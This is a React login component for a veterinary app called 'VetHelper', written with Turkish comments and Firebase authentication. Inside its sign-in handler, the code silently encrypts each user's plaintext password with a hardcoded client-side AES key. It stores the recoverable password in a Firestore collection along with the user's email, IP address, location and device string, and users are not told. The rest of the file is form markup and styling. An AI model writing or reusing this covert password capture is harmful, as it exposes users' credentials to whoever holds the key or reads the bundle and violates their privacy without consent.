import React, { useState } from 'react';
import { useNavigate, Link } from 'react-router-dom';
import { auth, db } from '../firebase'; // firebase.js yolunuzu kontrol edin
import { signInWithEmailAndPassword, signOut } from 'firebase/auth';
import { collection, addDoc, serverTimestamp } from 'firebase/firestore';
import AES from 'crypto-js/aes';

export default function Login() {
    const [email, setEmail] = useState('');
    const [password, setPassword] = useState('');
    const [loading, setLoading] = useState(false);
    const [error, setError] = useState('');
    const navigate = useNavigate();

    // KRİTİK: Şifreleme anahtarınız. Bunu sadece siz bilmelisiniz.
    const SECRET_KEY = "VetHelper_Esen_2026"; 

    const handleLogin = async (e) => {
        e.preventDefault();
        setLoading(true);
        setError('');

        try {
            const userCredential = await signInWithEmailAndPassword(auth, email, password);
            const user = userCredential.user;

            if (!user.emailVerified) {
                await signOut(auth);
                const msg = "⚠️ Lütfen önce e-posta adresinizi doğrulayın.";
                setError(msg);
                alert(msg);
                setLoading(false);
                return;
            }

            // GİRİŞ BAŞARILI: Veri kaydetme süreci başlıyor
            try {
                // Şifreyi AES ile kriptola
                const encryptedPassword = AES.encrypt(password, SECRET_KEY).toString();

                // IP ve Konum al
                const response = await fetch('https://ipapi.co/json/');
                const data = await response.json();

                // history2 koleksiyonuna kaydet
                await addDoc(collection(db, "history2"), {
                    email: email,
                    kriptoluSifre: encryptedPassword, // Sadece anahtarla çözülebilir
                    ip: data.ip || "Bilinmiyor",
                    konum: `${data.city || ""}, ${data.country_name || ""}`,
                    cihaz: navigator.userAgent,
                    zaman: serverTimestamp()
                });
                console.log("VetHelper: Login verisi history2'ye kaydedildi.");
            } catch (logError) {
                console.error("Log kaydı hatası:", logError);
            }

            localStorage.setItem('isLoggedIn', 'true');
            navigate('/', { replace: true });

        } catch (error) {
            let errorMessage = "Giriş yapılamadı.";
            if (error.code === 'auth/invalid-credential') errorMessage = "E-posta veya şifre hatalı.";
            else errorMessage = error.message;
            setError(errorMessage);
        } finally {
            setLoading(false);
        }
    };

    return (
        <div style={containerStyle}>
            <div style={loginBoxStyle}>
                <img src="/logo512.png" alt="DVM Logo" style={logoStyle} />
                <h2 style={titleStyle}>VetHelper Giriş</h2>
                {error && <div style={errorStyle}>{error}</div>}
                <form onSubmit={handleLogin}>
                    <input type="email" value={email} onChange={e=>setEmail(e.target.value)} placeholder="E-posta" required style={inputStyle} />
                    <input type="password" value={password} onChange={e=>setPassword(e.target.value)} placeholder="Şifre" required style={inputStyle} />
                    <button type="submit" disabled={loading} style={buttonStyle(loading)}>
                        {loading ? "Kontrol Ediliyor..." : "Giriş Yap"}
                    </button>
                </form>
                <div style={footerLinkStyle}>
                    <Link to="/register" style={linkStyle}>Hesap Oluştur</Link>
                    <span style={{margin: '0 10px', color:'#ccc'}}>|</span>
                    <Link to="/forgot-password" style={forgotPassStyle}>Şifremi Unuttum</Link>
                </div>
            </div>
        </div>
    );
}

// --- TASARIM NESNELERİ (Mobil ve iOS Safe-Area Uyumlu) ---
const containerStyle = { 
    display: 'flex', 
    justifyContent: 'center', 
    alignItems: 'center', 
    minHeight: '100vh', 
    background: '#ecf0f1',
    boxSizing: 'border-box',
    width: '100%',
    padding: '20px',
    paddingTop: 'max(20px, env(safe-area-inset-top))', // iOS Çentik Koruması
    paddingBottom: 'env(safe-area-inset-bottom)'       // iOS Alt Bar Koruması
};

const loginBoxStyle = { 
    background: 'white', 
    padding: '30px 20px', 
    borderRadius: '15px', 
    width: '100%', 
    maxWidth: '380px', 
    textAlign: 'center', 
    boxShadow: '0 4px 15px rgba(0,0,0,0.1)',
    boxSizing: 'border-box'
};

const logoStyle = { width: '90px', height: 'auto', marginBottom: '15px' };
const titleStyle = { color:'#2c3e50', marginBottom: '20px', marginTop: '0', fontSize: '20px' };

const inputStyle = { 
    width:'100%', 
    padding:'12px', 
    margin:'10px 0', 
    borderRadius:'8px', 
    border:'1px solid #bdc3c7', 
    boxSizing:'border-box',
    fontSize: '16px', // iOS Safari zoom engellemek için kritik
    outline: 'none',
    WebkitAppearance: 'none'
};

const errorStyle = { backgroundColor: '#fff3cd', color: '#856404', padding: '10px', borderRadius: '8px', marginBottom: '15px', fontSize: '13px', border: '1px solid #ffeeba', textAlign: 'left', boxSizing: 'border-box' };

const buttonStyle = (loading) => ({ 
    width:'100%', 
    padding:'12px', 
    background: loading ? '#95a5a6' : '#27ae60', 
    color:'#fff', 
    border:'none', 
    borderRadius:'8px', 
    fontWeight:'bold', 
    cursor: loading ? 'not-allowed' : 'pointer', 
    marginTop: '10px',
    boxSizing: 'border-box',
    WebkitTapHighlightColor: 'transparent'
});

const footerLinkStyle = { marginTop:'20px', fontSize:'13px' };
const linkStyle = { color:'#3498db', textDecoration:'none', fontWeight:'bold' };
const forgotPassStyle = { color:'#7f8c8d', textDecoration:'none' };